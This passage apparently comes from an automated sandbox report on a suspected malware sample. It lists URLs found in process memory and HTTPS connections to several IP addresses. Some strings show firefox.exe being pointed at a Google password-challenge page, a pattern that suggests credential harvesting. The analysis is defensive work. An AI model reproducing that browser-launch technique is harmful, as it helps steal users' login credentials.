Source: firefox.exe, 0000001F.00000003.2845479795.00000294AD02D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: file.exe, 00000000.00000002.2213992001.0000000000F2C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: 5a20612cd1.exe, 00000011.00000003.2869633293.0000000005A8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2991035077.00000294B46D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: file.exe, 00000000.00000002.2213992001.0000000000F2C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2213992001.0000000000FC7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2097723660.000000000C6AA000.00000004.00000020.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2869633293.0000000005A8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2908716384.00000294AC5F3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2991035077.00000294B46D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 5a20612cd1.exe, 00000011.00000003.2869633293.0000000005A8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2991035077.00000294B46D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: file.exe, 00000000.00000002.2213992001.0000000000F2C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2213992001.0000000000FC7000.00000040.00000001.01000000.00000003.sdmp, firefox.exe, 0000001F.00000002.2888692712.00000294A7C5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: file.exe, 00000000.00000002.2213992001.0000000000F2C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/d=enterpk2016&ui=en-us&rs=en-us&ad=us
Source: file.exe, 00000000.00000003.2097723660.000000000C6AA000.00000004.00000020.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.2869633293.0000000005A8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2991035077.00000294B46D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 0000001F.00000002.2876906851.000000C465F3C000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.orgo
Source: firefox.exe, 0000001F.00000002.2969171257.00000294AF67B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3002002577.00000C581CF11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: firefox.exe, 0000001F.00000002.2958725609.00000294AE903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3002467721.00000C7EBB904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3003702823.00001C0E8DC00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2986949900.00000294B435C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 0000001F.00000002.2891102981.00000294A7DBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 0000001F.00000002.2921314720.00000294ACE5E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2958725609.00000294AE903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3003383813.0000169348D00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3002467721.00000C7EBB904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2913315248.00000294ACA17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2908716384.00000294AC594000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2921314720.00000294ACE8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3003702823.00001C0E8DC00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2986949900.00000294B43E2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2991035077.00000294B4603000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 0000001F.00000002.3003383813.0000169348D00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/Z
Source: firefox.exe, 0000001F.00000002.2958725609.00000294AE903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3002467721.00000C7EBB904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3003702823.00001C0E8DC00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.wykop.pl/
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3003383813.0000169348D00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3002467721.00000C7EBB904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2913315248.00000294ACA17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2913315248.00000294ACA99000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2951927454.00000294AE314000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3003702823.00001C0E8DC00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2921314720.00000294ACE97000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2986949900.00000294B43E2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2991035077.00000294B4603000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 0000001F.00000002.3003383813.0000169348D00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/Z
Source: firefox.exe, 0000001F.00000002.3002467721.00000C7EBB904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2951927454.00000294AE314000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3003702823.00001C0E8DC00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2986949900.00000294B435C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 0000001F.00000002.2906853139.00000294AC110000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warningThe
Source: firefox.exe, 0000001F.00000002.2976050815.00000294B00AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2976050815.00000294B0083000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2892879533.00000294A853E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972970478.00000294AF903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 0000001F.00000002.2976050815.00000294B009B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972970478.00000294AF903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2884773158.000002949C411000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2969171257.00000294AF63C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2842841573.00000294AE9C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2976050815.00000294B0083000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2997499284.00000294B5D7E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2883419068.000002949C040000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2883581149.000002949C170000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2898856802.00000294A9B3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2986949900.00000294B43E2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2892879533.00000294A853E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2875179812.000002688E7F0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3046390205.0000021DB1E20000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 0000001D.00000002.2742673120.000001B54ACB2000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2749278476.000001EF426C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 0000001F.00000002.2885586316.000002949DCEC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2885586316.000002949DCC4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2875179812.000002688E7F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdjar:file:///C:/Progr
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/accountensureUnloadHandlerRegisteredopenPopup/openPopupPromise
Source: unknown Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50122 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50174 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50175
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50174
Source: unknown Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50176
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50297
Source: unknown Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown Network traffic detected: HTTP traffic on port 50094 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50182
Source: unknown Network traffic detected: HTTP traffic on port 50286 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50125 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown Network traffic detected: HTTP traffic on port 50194 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50109
Source: unknown Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50243 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50240 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50191
Source: unknown Network traffic detected: HTTP traffic on port 50107 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50190
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50193
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50192
Source: unknown Network traffic detected: HTTP traffic on port 50128 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50195
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50194
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50204 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50120 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50118
Source: unknown Network traffic detected: HTTP traffic on port 50195 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50196
Source: unknown Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50110
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50112
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50233
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50133 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50175 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50128
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50129
Source: unknown Network traffic detected: HTTP traffic on port 50142 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50192 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49672
Source: unknown Network traffic detected: HTTP traffic on port 50297 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50120
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50241
Source: unknown Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50240
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50122
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50243
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50121
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50242
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown Network traffic detected: HTTP traffic on port 50111 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50123
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50126
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50125
Source: unknown Network traffic detected: HTTP traffic on port 50241 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50094
Source: unknown Network traffic detected: HTTP traffic on port 50153 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50105 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown Network traffic detected: HTTP traffic on port 50170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50138
Source: unknown Network traffic detected: HTTP traffic on port 50193 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50164 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50133
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50132
Source: unknown Network traffic detected: HTTP traffic on port 50112 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50129 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50140
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown Network traffic detected: HTTP traffic on port 50169 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown Network traffic detected: HTTP traffic on port 49925 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50123 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50173 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50190 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50142
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown Network traffic detected: HTTP traffic on port 50070 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown Network traffic detected: HTTP traffic on port 50285 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50138 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50176 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50029 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49925
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49924
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49923
Source: unknown Network traffic detected: HTTP traffic on port 50084 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown Network traffic detected: HTTP traffic on port 50233 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49921
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown Network traffic detected: HTTP traffic on port 50191 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50153
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown Network traffic detected: HTTP traffic on port 50182 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50110 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50242 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49919
Source: unknown Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50140 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49912
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50204
Source: unknown Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50196 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50164
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50285
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50286
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50168
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50169
Source: unknown Network traffic detected: HTTP traffic on port 50109 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50132 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50171
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50170
Source: unknown Network traffic detected: HTTP traffic on port 50030 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50173
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50172
Source: unknown Network traffic detected: HTTP traffic on port 50126 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49830 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49839 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49875 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49883 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49898 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49912 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49924 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49925 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49933 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49935 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49953 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49965 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49984 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49997 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:50003 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:50022 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50030 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50031 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50036 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:50043 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:50057 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:50070 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:50084 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:50084 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50111 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50112 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50120 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50128 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50132 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50133 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:50168 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50170 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.129.91:443 -> 192.168.2.4:50172 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:50173 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50174 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50175 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50176 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50191 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50190 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50192 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50195 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50194 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50196 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50193 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50243 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50241 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50242 version: TLS 1.2
